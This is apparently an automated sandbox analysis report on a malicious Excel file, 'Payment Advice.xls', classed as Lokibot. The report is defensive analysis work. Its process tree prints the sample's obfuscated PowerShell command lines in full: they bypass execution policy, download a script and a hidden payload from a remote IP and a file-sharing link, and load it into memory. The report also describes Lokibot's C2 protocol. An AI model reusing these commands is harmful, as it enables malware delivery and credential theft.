Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Advice.xls

Overview

General Information

Sample name:Payment Advice.xls
Analysis ID:1544327
MD5:d6ad3108a8014d64c39ae1fe463112c5
SHA1:f5bb7665aa11ad21d9fa117a6e7b270c533a5844
SHA256:7b75ff23cf680717091181e61002f59e66a118302af798fc031548aead7a6af4
Tags:xlsuser-abuse_ch
Infos:

Detection

HTMLPhisher, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Lokibot
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3360 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3656 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3740 cmdline: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3940 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3948 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE550.tmp" "c:\Users\user\AppData\Local\Temp\1nxbdaco\CSCDA0B5C0F54B64E9AA66FC6FE2D4D8162.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 4044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 4088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 2692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
    • mshta.exe (PID: 2112 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1472 cmdline: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 1900 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 628 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2BF1.tmp" "c:\Users\user\AppData\Local\Temp\vbdaauwq\CSC29236E271A724343A6FBC96F9241CBFB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3732 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3860 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 4080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 3740JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 2692JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 2692INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x1ec7e:$b2: ::FromBase64String(
